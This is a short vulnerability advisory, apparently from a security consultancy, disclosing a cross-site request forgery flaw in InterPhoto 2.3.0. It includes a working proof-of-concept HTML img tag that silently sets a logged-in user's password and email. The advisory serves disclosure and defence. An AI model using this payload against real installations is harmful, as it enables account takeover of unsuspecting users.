Home
Consulting
Advisories
Software
Articles
Contact

InterPhoto 2.3.0 Cross-site Request Forgery

Legacy Advisories

Description

A cross-site request forgery vulnerability in InterPhoto 2.3.0 can be exploited to create a user's password.

Proof Of Concept

<html>
    <body>
        <img src="http://localhost/interphoto/mydesk.edit.php?action=updateuser&password=newpassword&repassword=newpassword&email=a%40a.com&userfullname=&usercompany=&useraddress=&userpostcode=&usertel=&userfax=&useronline=&userwebsite=" />
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC